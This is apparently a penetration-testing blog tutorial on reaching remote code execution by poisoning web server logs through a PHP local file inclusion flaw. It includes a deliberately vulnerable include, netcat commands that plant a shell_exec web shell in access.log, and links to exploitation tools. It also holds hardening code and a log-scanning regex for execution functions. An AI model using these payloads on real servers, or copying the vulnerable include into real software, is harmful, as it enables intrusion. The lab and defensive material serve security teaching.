
RCE via LFI Log Poisoning

Hello everyone! Welcome to pentestguy. In this article, we are focusing on RCE via LFI log poisoning. As we all know, RCE (remote code execution) is one of the most critical vulnerabilities, and you can achieve it via LFI log poisoning. But most people are confused about log poisoning and LFI, so here is a simple explanation.

Whenever we make a request to a web server, it logs that request, whether it is good or bad (no matter what request comes in and what response goes out, everything is logged).

For example, if an attacker finds a local file inclusion vulnerability in a web application, the attacker can include local files from that server and expose sensitive files. But what if the attacker can include a log file (the web server process must have read permission on that log file)? Then the attacker can execute code remotely.

Lab Setup

  1. Windows/Linux
  2. XAMPP

If you are using Windows with XAMPP, place the code below in the htdocs folder located at C:\xampp\htdocs and save the file with a .php extension.

<?php
    // Deliberately vulnerable: includes whatever path the client supplies, with no validation.
    include($_GET['file']);
?>

The vulnerable code above has a file parameter that includes whatever file is named in it, so an attacker can include arbitrary local files.
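As an added example (not code from the original post), here is the hardened counterpart of the include above. It assumes the includable pages live in a pages/ directory next to the script and that only the names in $allowed are legitimate; the user never supplies a path or extension, and the resolved path is checked against the base directory before anything is included.

```php
<?php
// Added example, not from the page: hardened form of include($_GET['file']).
// Assumed layout: includable pages live in ./pages/ and only the names in $allowed are valid.
declare(strict_types=1);

$allowed = ['home', 'about', 'contact'];   // assumed page names for this example

function resolvePage(string $requested, array $allowed, string $baseDir): ?string
{
    // 1. Accept only a short list of known names: no paths, no extensions from the user.
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    // 2. Build the path ourselves and confirm it resolves inside $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested . '.php');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$requested = $_GET['file'] ?? 'home';
$page = resolvePage($requested, $allowed, __DIR__ . '/pages');

if ($page === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $page;
```

With this in place, a request such as file=home returns pages/home.php, while any value that is not in the allowlist, including traversal sequences or a log file name, is rejected before include runs. Keeping allow_url_include disabled in php.ini and running the web server under an account that cannot read Apache's log directory removes the other two preconditions the attack in this article relies on.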


For example, http://192.168.1.8/lfi/path.php?file=home.php ; make sure that home.php is present in the htdocs folder (in the above case, place all files in an lfi directory inside htdocs).

Now you need to perform log poisoning. For that we are going to use nc (netcat); here is a basic tutorial on netcat: https://pentestguy.com/the-ultimate-guide-to-netcat/

First, let's check whether our request gets logged. Use the command given below.

nc -nv <target ip> 80
Hello PentestGuy      // this is a message


Check the access.log file and you will find your last request with a message.


Now, let's send malicious PHP code using netcat. It will be written to the access.log file, and after that we will include that file via the file parameter of the vulnerable code above.

nc -nv 192.168.1.8 80
<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>


Access the URL and provide the command that you want to execute.


In the above example, the command ipconfig is run through the cmd parameter.
For Linux, the process is the same, but make sure that the log file is readable by the web server. A simple way to check is to include the log file and see whether its contents are returned.
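From the defender's side, the poisoning step leaves a clear trace: a line in access.log containing a PHP open tag or an execution function where only a request line and headers should be. The following is an added example, not part of the original post, that scans log lines for that signature. The sample log lines are constructed for this example; the second one mirrors the payload sent with netcat above, as Apache would record a malformed request.

```php
<?php
// Added example, not from the page: flag access-log lines carrying injected PHP code.
declare(strict_types=1);

function findPoisonedLines(iterable $lines): array
{
    // An opening PHP tag (long or short-echo) or a common code-execution function
    // has no business in a raw access-log line.
    $pattern = '/<\?(?:php|=)|\b(?:shell_exec|system|passthru|exec|eval)\s*\(/i';
    $hits = [];
    foreach ($lines as $no => $line) {
        if (preg_match($pattern, $line)) {
            $hits[] = ['line' => $no + 1, 'text' => rtrim($line)];
        }
    }
    return $hits;
}

// Constructed sample lines in Apache combined format (not real log data).
$sample = [
    '192.168.1.20 - - [10/Oct/2023:10:00:01 +0000] "GET /lfi/path.php?file=home.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.1.20 - - [10/Oct/2023:10:00:07 +0000] "<?php echo \'<pre>\' . shell_exec($_GET[\'cmd\']) . \'</pre>\';?>" 400 226 "-" "-"',
    '192.168.1.20 - - [10/Oct/2023:10:00:12 +0000] "GET /lfi/path.php?file=home.php HTTP/1.1" 200 512 "-" "curl/7.88"',
];

// To run over a real file instead: $hits = findPoisonedLines(file('/path/to/access.log'));
foreach (findPoisonedLines($sample) as $h) {
    echo "line {$h['line']}: {$h['text']}\n";
}
```

Only the second sample line is reported, since the other two are ordinary GET requests. Running this check on a schedule, or feeding the same pattern to a log-monitoring rule, catches the poisoning attempt before the follow-up include request, and a 400 response paired with a request line that is not a valid HTTP verb is itself a useful secondary indicator.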

Top 25 LFI parameters: https://raw.githubusercontent.com/lutfumertceylan/top25-parameter/master/lfi-parameters.txt

Use LFISuite for automatic exploitation: https://github.com/D35m0nd142/LFISuite

You can also check the video tutorial for easy learning.

If you found this post helpful then please share it with your co-workers and friends. Please provide your valuable comments and let us know if there are any suggestions. Now you can also collaborate with us please check our collaboration page, thank you!